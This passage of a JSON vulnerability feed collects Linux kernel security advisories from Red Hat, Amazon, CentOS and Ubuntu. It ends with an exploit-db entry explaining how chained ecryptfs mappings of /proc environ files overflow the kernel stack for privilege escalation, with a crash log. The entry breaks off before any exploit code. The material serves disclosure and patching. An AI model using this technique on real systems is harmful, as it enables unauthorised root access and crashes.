over the previous version. (BZ#1366059)\n\nSecurity Fix(es):\n\n* A security flaw was found in the Linux kernel in the mark_source_chains() function in \"net/ipv4/netfilter/ip_tables.c\". It is possible for a user-supplied \"ipt_entry\" structure to have a large \"next_offset\" field. This field is not bounds checked prior to writing to a counter value at the supplied offset. (CVE-2016-3134, Important)\n\n* A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges. (CVE-2016-4997, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)", "modified": "2018-06-07T08:58:30", "published": "2016-09-14T18:42:27", "id": "RHSA-2016:1883", "href": "https://access.redhat.com/errata/RHSA-2016:1883", "type": "redhat", "title": "(RHSA-2016:1883) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:42", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3134", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-6197", "CVE-2016-6198"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nThe kernel-rt packages have been upgraded to the kernel-3.10.0-327.36.1 source tree, which provides a number of bug fixes over the previous version. 
(BZ#1366538)\n\nSecurity Fix(es):\n\n* A security flaw was found in the Linux kernel in the mark_source_chains() function in \"net/ipv4/netfilter/ip_tables.c\". It is possible for a user-supplied \"ipt_entry\" structure to have a large \"next_offset\" field. This field is not bounds checked prior to writing to a counter value at the supplied offset. (CVE-2016-3134, Important)\n\n* A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges. (CVE-2016-4997, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)", "modified": "2018-03-19T16:29:52", "published": "2016-09-14T18:34:58", "id": "RHSA-2016:1875", "href": "https://access.redhat.com/errata/RHSA-2016:1875", "type": "redhat", "title": "(RHSA-2016:1875) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:30:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3134", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-6197", "CVE-2016-6198"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A security flaw was found in the Linux kernel in the mark_source_chains() function in \"net/ipv4/netfilter/ip_tables.c\". It is possible for a user-supplied \"ipt_entry\" structure to have a large \"next_offset\" field. 
This field is not bounds checked prior to writing to a counter value at the supplied offset. (CVE-2016-3134, Important)\n\n* A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges. (CVE-2016-4997, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\nBug Fix(es):\n\n* In some cases, running the ipmitool command caused a kernel panic due to a race condition in the ipmi message handler. This update fixes the race condition, and the kernel panic no longer occurs in the described scenario. (BZ#1353947)\n\n* Previously, running I/O-intensive operations in some cases caused the system to terminate unexpectedly after a null pointer dereference in the kernel. With this update, a set of patches has been applied to the 3w-9xxx and 3w-sas drivers that fix this bug. As a result, the system no longer crashes in the described scenario. (BZ#1362040)\n\n* Previously, the Stream Control Transmission Protocol (SCTP) sockets did not inherit the SELinux labels properly. As a consequence, the sockets were labeled with the unlabeled_t SELinux type which caused SCTP connections to fail. The underlying source code has been modified, and SCTP connections now work as expected. (BZ#1354302)\n\n* Previously, the bnx2x driver waited for transmission completions when recovering from a parity event, which substantially increased the recovery time. 
With this update, bnx2x does not wait for transmission completion in the described circumstances. As a result, the recovery of bnx2x after a parity event now takes less time. (BZ#1351972)\n\nEnhancement(s):\n\n* With this update, the audit subsystem enables filtering of processes by name besides filtering by PID. Users can now audit by executable name (with the \"-F exe=<path-to-executable>\" option), which allows expression of many new audit rules. This functionality can be used to create events when specific applications perform a syscall. (BZ#1345774)\n\n* With this update, the Nonvolatile Memory Express (NVMe) and the multi-queue block layer (blk_mq) have been upgraded to the Linux 4.5 upstream version. Previously, a race condition between timeout and freeing request in blk_mq occurred, which could affect the blk_mq_tag_to_rq() function and consequently a kernel oops could occur. The provided patch fixes this race condition by updating the tags with the active request. The patch simplifies blk_mq_tag_to_rq() and ensures that the two requests are not active at the same time. (BZ#1350352)\n\n* The Hyper-V storage driver (storvsc) has been upgraded from upstream. This update provides moderate performance improvement of I/O operations when using storvsc for certain workloads. (BZ#1360161)\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included in this advisory. 
To see the complete list of bug fixes and enhancements, refer to the following KnowledgeBase article: https://access.redhat.com/articles/2592321", "modified": "2018-04-12T03:33:05", "published": "2016-09-14T18:34:54", "id": "RHSA-2016:1847", "href": "https://access.redhat.com/errata/RHSA-2016:1847", "type": "redhat", "title": "(RHSA-2016:1847) Important: kernel security, bug fix, and enhancement update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* It was found that stacking a file system over procfs in the Linux kernel could lead to a kernel stack overflow due to deep nesting, as demonstrated by mounting ecryptfs over procfs and creating a recursion by mapping /proc/environ. An unprivileged, local user could potentially use this flaw to escalate their privileges on the system. (CVE-2016-1583, Important)\n\nBug Fix(es):\n\n* Previously, while the MAP_GROWSDOWN flag was set, writing to the memory which was mapped with the mmap system call failed with the SIGBUS signal. This update fixes memory management in the Linux kernel by backporting an upstream patch that enlarges the stack guard page gap. As a result, mmap now works as expected under the described circumstances. 
(BZ#1474721)", "modified": "2017-09-19T11:07:12", "published": "2017-09-19T10:59:07", "id": "RHSA-2017:2760", "href": "https://access.redhat.com/errata/RHSA-2017:2760", "type": "redhat", "title": "(RHSA-2017:2760) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the Linux kernel's keyring handling code, where in key_reject_and_link() an uninitialized variable would eventually lead to an arbitrary free address, which could allow an attacker to use a use-after-free style attack. (CVE-2016-4470, Important)\n\nThis issue was discovered by David Howells (Red Hat Inc.).", "modified": "2016-10-18T17:58:58", "published": "2016-10-18T17:53:29", "id": "RHSA-2016:2076", "href": "https://access.redhat.com/errata/RHSA-2016:2076", "type": "redhat", "title": "(RHSA-2016:2076) Important: kernel security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the Linux kernel's keyring handling code, where in key_reject_and_link() an uninitialized variable would eventually lead to an arbitrary free address, which could allow an attacker to use a use-after-free style attack. (CVE-2016-4470, Important)\n\nThis issue was discovered by David Howells (Red Hat Inc.).\n\nBug Fix(es):\n\n* Previously, the BUG_ON() signal appeared in the fs_clear_inode() function where the nfs_have_writebacks() function reported a positive value for nfs_inode->npages. As a consequence, a kernel panic occurred. 
This update performs a serialization by holding the inode i_lock over the check of PagePrivate and locking the request, which fixes this bug. (BZ#1365161)", "modified": "2016-10-18T14:40:04", "published": "2016-10-18T14:37:45", "id": "RHSA-2016:2074", "href": "https://access.redhat.com/errata/RHSA-2016:2074", "type": "redhat", "title": "(RHSA-2016:2074) Important: kernel security and bug fix update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9806", "CVE-2016-4951", "CVE-2016-4997", "CVE-2016-4998"], "description": "**Issue Overview:**\n\nA flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS. ([CVE-2016-4997 __](<https://access.redhat.com/security/cve/CVE-2016-4997>))\n\nAn out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. ([CVE-2016-4998 __](<https://access.redhat.com/security/cve/CVE-2016-4998>))\n\nA vulnerability was found in the Linux kernel. The pointer to the netlink socket attribute is not checked, which could cause a null pointer dereference when parsing the nested attributes in function tipc_nl_publ_dump(). \nThis allows local users to cause a DoS. ([CVE-2016-4951 __](<https://access.redhat.com/security/cve/CVE-2016-4951>))\n\nA double free vulnerability was found in netlink_dump, which could cause a denial of service or possibly other unspecified impact. 
([CVE-2016-9806 __](<https://access.redhat.com/security/cve/CVE-2016-9806>))\n\n(Updated on 2016-07-14: [CVE-2016-4998 __](<https://access.redhat.com/security/cve/CVE-2016-4998>) and [CVE-2016-4951 __](<https://access.redhat.com/security/cve/CVE-2016-4951>) were fixed in this version, but were not previously listed in this errata.)\n\n(Updated on 2017-01-19: [CVE-2016-9806 __](<https://access.redhat.com/security/cve/CVE-2016-9806>) was fixed in this release but was previously not part of this errata.)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.4.14-24.50.amzn1.i686 \n kernel-devel-4.4.14-24.50.amzn1.i686 \n kernel-tools-4.4.14-24.50.amzn1.i686 \n perf-debuginfo-4.4.14-24.50.amzn1.i686 \n kernel-4.4.14-24.50.amzn1.i686 \n kernel-headers-4.4.14-24.50.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.14-24.50.amzn1.i686 \n kernel-debuginfo-4.4.14-24.50.amzn1.i686 \n kernel-tools-debuginfo-4.4.14-24.50.amzn1.i686 \n kernel-tools-devel-4.4.14-24.50.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.14-24.50.amzn1.noarch \n \n src: \n kernel-4.4.14-24.50.amzn1.src \n \n x86_64: \n perf-debuginfo-4.4.14-24.50.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.14-24.50.amzn1.x86_64 \n kernel-4.4.14-24.50.amzn1.x86_64 \n kernel-tools-4.4.14-24.50.amzn1.x86_64 \n kernel-headers-4.4.14-24.50.amzn1.x86_64 \n kernel-devel-4.4.14-24.50.amzn1.x86_64 \n perf-4.4.14-24.50.amzn1.x86_64 \n kernel-tools-devel-4.4.14-24.50.amzn1.x86_64 \n kernel-debuginfo-4.4.14-24.50.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.14-24.50.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2016-06-24T22:21:00", "published": "2016-06-24T22:21:00", "id": "ALAS-2016-718", "href": "https://alas.aws.amazon.com/ALAS-2016-718.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:29:08", 
"bulletinFamily": "unix", "cvelist": ["CVE-2016-6198", "CVE-2016-4997", "CVE-2016-6197", "CVE-2016-4998", "CVE-2016-3134"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1847\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A security flaw was found in the Linux kernel in the mark_source_chains() function in \"net/ipv4/netfilter/ip_tables.c\". It is possible for a user-supplied \"ipt_entry\" structure to have a large \"next_offset\" field. This field is not bounds checked prior to writing to a counter value at the supplied offset. (CVE-2016-3134, Important)\n\n* A flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitrary kernel memory when unloading a kernel module. This action is usually restricted to root-privileged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS and the user is granted elevated privileges. (CVE-2016-4997, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\nBug Fix(es):\n\n* In some cases, running the ipmitool command caused a kernel panic due to a race condition in the ipmi message handler. This update fixes the race condition, and the kernel panic no longer occurs in the described scenario. (BZ#1353947)\n\n* Previously, running I/O-intensive operations in some cases caused the system to terminate unexpectedly after a null pointer dereference in the kernel. With this update, a set of patches has been applied to the 3w-9xxx and 3w-sas drivers that fix this bug. As a result, the system no longer crashes in the described scenario. 
(BZ#1362040)\n\n* Previously, the Stream Control Transmission Protocol (SCTP) sockets did not inherit the SELinux labels properly. As a consequence, the sockets were labeled with the unlabeled_t SELinux type which caused SCTP connections to fail. The underlying source code has been modified, and SCTP connections now works as expected. (BZ#1354302)\n\n* Previously, the bnx2x driver waited for transmission completions when recovering from a parity event, which substantially increased the recovery time. With this update, bnx2x does not wait for transmission completion in the described circumstances. As a result, the recovery of bnx2x after a parity event now takes less time. (BZ#1351972)\n\nEnhancement(s):\n\n* With this update, the audit subsystem enables filtering of processes by name besides filtering by PID. Users can now audit by executable name (with the \"-F exe=<path-to-executable>\" option), which allows expression of many new audit rules. This functionality can be used to create events when specific applications perform a syscall. (BZ#1345774)\n\n* With this update, the Nonvolatile Memory Express (NVMe) and the multi-queue block layer (blk_mq) have been upgraded to the Linux 4.5 upstream version. Previously, a race condition between timeout and freeing request in blk_mq occurred, which could affect the blk_mq_tag_to_rq() function and consequently a kernel oops could occur. The provided patch fixes this race condition by updating the tags with the active request. The patch simplifies blk_mq_tag_to_rq() and ensures that the two requests are not active at the same time. (BZ#1350352)\n\n* The Hyper-V storage driver (storvsc) has been upgraded from upstream. This update provides moderate performance improvement of I/O operations when using storvscr for certain workloads. (BZ#1360161)\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included in this advisory. 
To see the complete list of bug fixes and enhancements, refer to the following KnowledgeBase article: https://access.redhat.com/articles/2592321\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034123.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1847.html", "edition": 5, "modified": "2016-09-19T15:43:06", "published": "2016-09-19T15:43:06", "id": "CESA-2016:1847", "href": "http://lists.centos.org/pipermail/centos-announce/2016-September/034123.html", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "Jann Horn discovered that eCryptfs improperly attempted to use the mmap() \nhandler of a lower filesystem that did not implement one, causing a \nrecursive page fault to occur. A local unprivileged attacker could use to \ncause a denial of service (system crash) or possibly execute arbitrary code \nwith administrative privileges.", "edition": 5, "modified": "2016-06-10T00:00:00", "published": "2016-06-10T00:00:00", "id": "USN-3008-1", "href": "https://ubuntu.com/security/notices/USN-3008-1", "title": "Linux kernel (Qualcomm Snapdragon) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "Jann Horn discovered that eCryptfs improperly attempted to use the mmap() \nhandler of a lower filesystem that did not implement one, causing a \nrecursive page fault to occur. 
A local unprivileged attacker could use to \ncause a denial of service (system crash) or possibly execute arbitrary code \nwith administrative privileges.", "edition": 5, "modified": "2016-06-10T00:00:00", "published": "2016-06-10T00:00:00", "id": "USN-2999-1", "href": "https://ubuntu.com/security/notices/USN-2999-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:22:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4913", "CVE-2016-4951", "CVE-2016-4569", "CVE-2016-4997", "CVE-2016-4482", "CVE-2016-4578", "CVE-2016-4580", "CVE-2016-4998"], "description": "Jesse Hertz and Tim Newsham discovered that the Linux netfilter \nimplementation did not correctly perform validation when handling 32 bit \ncompatibility IPT_SO_SET_REPLACE events on 64 bit platforms. A local \nunprivileged attacker could use this to cause a denial of service (system \ncrash) or execute arbitrary code with administrative privileges. \n(CVE-2016-4997)\n\nKangjie Lu discovered an information leak in the core USB implementation in \nthe Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4482)\n\nKangjie Lu discovered an information leak in the timer handling \nimplementation in the Advanced Linux Sound Architecture (ALSA) subsystem of \nthe Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4569, CVE-2016-4578)\n\nKangjie Lu discovered an information leak in the X.25 Call Request handling \nin the Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4580)\n\nIt was discovered that an information leak exists in the Rock Ridge \nimplementation in the Linux kernel. 
A local attacker who is able to mount a \nmalicious iso9660 file system image could exploit this flaw to obtain \npotentially sensitive information from kernel memory. (CVE-2016-4913)\n\nBaozeng Ding discovered that the Transparent Inter-process Communication \n(TIPC) implementation in the Linux kernel did not verify socket existence \nbefore use in some situations. A local attacker could use this to cause a \ndenial of service (system crash). (CVE-2016-4951)\n\nJesse Hertz and Tim Newsham discovered that the Linux netfilter \nimplementation did not correctly perform validation when handling \nIPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to \ncause a denial of service (system crash) or obtain potentially sensitive \ninformation from kernel memory. (CVE-2016-4998)", "edition": 5, "modified": "2016-06-27T00:00:00", "published": "2016-06-27T00:00:00", "id": "USN-3017-1", "href": "https://ubuntu.com/security/notices/USN-3017-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:45:12", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4913", "CVE-2016-4951", "CVE-2016-4569", "CVE-2016-4997", "CVE-2016-4482", "CVE-2016-4578", "CVE-2016-4580", "CVE-2016-4998"], "description": "Jesse Hertz and Tim Newsham discovered that the Linux netfilter \nimplementation did not correctly perform validation when handling 32 bit \ncompatibility IPT_SO_SET_REPLACE events on 64 bit platforms. A local \nunprivileged attacker could use this to cause a denial of service (system \ncrash) or execute arbitrary code with administrative privileges. \n(CVE-2016-4997)\n\nKangjie Lu discovered an information leak in the core USB implementation in \nthe Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. 
(CVE-2016-4482)\n\nKangjie Lu discovered an information leak in the timer handling \nimplementation in the Advanced Linux Sound Architecture (ALSA) subsystem of \nthe Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4569, CVE-2016-4578)\n\nKangjie Lu discovered an information leak in the X.25 Call Request handling \nin the Linux kernel. A local attacker could use this to obtain potentially \nsensitive information from kernel memory. (CVE-2016-4580)\n\nIt was discovered that an information leak exists in the Rock Ridge \nimplementation in the Linux kernel. A local attacker who is able to mount a \nmalicious iso9660 file system image could exploit this flaw to obtain \npotentially sensitive information from kernel memory. (CVE-2016-4913)\n\nBaozeng Ding discovered that the Transparent Inter-process Communication \n(TIPC) implementation in the Linux kernel did not verify socket existence \nbefore use in some situations. A local attacker could use this to cause a \ndenial of service (system crash). (CVE-2016-4951)\n\nJesse Hertz and Tim Newsham discovered that the Linux netfilter \nimplementation did not correctly perform validation when handling \nIPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to \ncause a denial of service (system crash) or obtain potentially sensitive \ninformation from kernel memory. (CVE-2016-4998)", "edition": 5, "modified": "2016-06-27T00:00:00", "published": "2016-06-27T00:00:00", "id": "USN-3016-3", "href": "https://ubuntu.com/security/notices/USN-3016-3", "title": "Linux kernel (Qualcomm Snapdragon) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-06-21T17:03:06", "description": "Linux - ecryptfs and /proc/$pid/environ Privilege Escalation. CVE-2016-1583. 
Local exploit for linux platform", "published": "2016-06-21T00:00:00", "type": "exploitdb", "title": "Linux - ecryptfs and /proc/$pid/environ Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1583"], "modified": "2016-06-21T00:00:00", "id": "EDB-ID:39992", "href": "https://www.exploit-db.com/exploits/39992/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836\r\n\r\nStacking filesystems, including ecryptfs, protect themselves against\r\ndeep nesting, which would lead to kernel stack overflow, by tracking\r\nthe recursion depth of filesystems. E.g. in ecryptfs, this is\r\nimplemented in ecryptfs_mount() as follows:\r\n\r\n\ts->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;\r\n\r\n\trc = -EINVAL;\r\n\tif (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {\r\n\t\tpr_err(\"eCryptfs: maximum fs stacking depth exceeded\\n\");\r\n\t\tgoto out_free;\r\n\t}\r\n\r\n\r\nThe files /proc/$pid/{mem,environ,cmdline}, when read, access the\r\nuserspace memory of the target process, involving, if necessary,\r\nnormal pagefault handling. If it was possible to mmap() them, an\r\nattacker could create a chain of e.g. /proc/$pid/environ mappings\r\nwhere process 1 has /proc/2/environ mapped into its environment area,\r\nprocess 2 has /proc/3/environ mapped into its environment area and so\r\non. A read from /proc/1/environ would invoke the pagefault handler for\r\nprocess 1, which would invoke the pagefault handler for process 2 and\r\nso on. This would, again, lead to kernel stack overflow.\r\n\r\n\r\nOne interesting fact about ecryptfs is that, because of the encryption\r\ninvolved, it doesn't just forward mmap to the lower file's mmap\r\noperation. Instead, it has its own page cache, maintained using the\r\nnormal filemap helpers, and performs its cryptographic operations when\r\ndirty pages need to be written out or when pages need to be faulted\r\nin. 
Therefore, not just its read and write handlers, but also its mmap\r\nhandler only uses the lower filesystem's read and write methods.\r\nThis means that using ecryptfs, you can mmap [decrypted views of]\r\nfiles that normally wouldn't be mappable.\r\n\r\nCombining these things, it is possible to trigger recursion with\r\narbitrary depth where:\r\n\r\na reading userspace memory access in process A (from userland or from\r\n copy_from_user())\r\ncauses a pagefault in an ecryptfs mapping in process A, which\r\ncauses a read from /proc/{B}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process B, which\r\ncauses a read from /proc/{C}/environ, which\r\ncauses a pagefault in an ecryptfs mapping in process C, and so on.\r\n\r\nOn systems with the /sbin/mount.ecryptfs_private helper installed\r\n(e.g. Ubuntu if the \"encrypt my home directory\" checkbox is ticked\r\nduring installation), this bug can be triggered by an unprivileged\r\nuser. The mount helper considers /proc/$pid, where $pid is the PID of\r\na process owned by the user, to be a valid mount source because the\r\ndirectory is \"owned\" by the user.\r\n\r\nI have attached both a generic crash PoC and a build-specific exploit\r\nthat can be used to gain root privileges from a normal user account on\r\nUbuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version\r\n4.4.0-22.40, uname \"Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu\r\nSMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\".\r\n\r\ndmesg output of the crasher:\r\n\r\n```\r\n[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0\r\n[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] PGD 1e0d067 PUD 0 \r\n[ 80.040028] Thread overran stack, or stack corrupted\r\n[ 80.040028] Oops: 0000 [#1] SMP \r\n[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi 
vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video\r\n[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu\r\n[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006\r\n[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000\r\n[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046\r\n[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068\r\n[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200\r\n[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000\r\n[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200\r\n[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68\r\n[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000\r\n[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0\r\n[ 80.040028] Stack:\r\n[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00\r\n[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68\r\n[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200\r\n[ 80.040028] Call Trace:\r\n[ 80.040028] <IRQ> \r\n[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160\r\n[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0\r\n[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80\r\n[ 80.040028] [<ffffffff810b146f>] ? 
sched_clock_cpu+0x7f/0xa0\r\n[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0\r\n[ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60\r\n[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60\r\n[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60\r\n[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70\r\n[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290\r\n[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0\r\n[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60\r\n[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50\r\n[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90\r\n[ 80.040028] <EOI> \r\n[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d \r\n[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40\r\n[ 80.040028] RSP <ffff88021fc03d70>\r\n[ 80.040028] CR2: fffffffe4b9145c0\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16\r\n[ 80.040028] ---[ end trace 616e3de50958c35b ]---\r\n[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt\r\n[ 80.040028] Shutting down cpus with NMI\r\n[ 80.040028] Kernel Offset: disabled\r\n[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt\r\n```\r\n\r\nexample run of the 